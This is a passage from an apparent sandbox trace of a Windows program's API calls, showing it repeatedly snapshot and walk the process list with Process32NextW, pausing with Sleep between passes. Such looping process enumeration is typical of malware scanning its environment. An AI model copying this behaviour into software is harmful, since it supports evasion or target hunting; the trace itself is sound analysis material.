th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0154.568] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.569] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.570] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.572] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.573] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.575] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0154.576] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.578] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.580] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.582] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0154.585] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0154.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0154.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0154.589] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0154.591] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0154.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0154.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0154.595] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0154.597] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0154.598] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0154.607] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0154.609] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0154.610] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0154.612] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0154.613] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0154.614] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0154.616] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0154.617] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0154.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0154.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0154.623] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0154.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0154.625] CloseHandle (hObject=0xbc) returned 1 [0154.625] Sleep (dwMilliseconds=0x12c) [0154.933] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0154.937] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.938] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0154.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0154.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.940] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0154.941] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.941] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0154.942] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0154.942] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.943] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0154.944] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.944] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.945] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.946] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.946] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.947] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0154.948] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.948] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.949] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.950] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.951] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.952] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0154.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.972] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.974] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0154.975] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0154.976] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0154.977] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0154.978] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0154.979] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0154.988] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0154.989] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0154.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0154.991] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0154.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0154.993] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0154.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0154.995] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0154.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0154.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0154.998] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0154.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0155.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0155.001] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
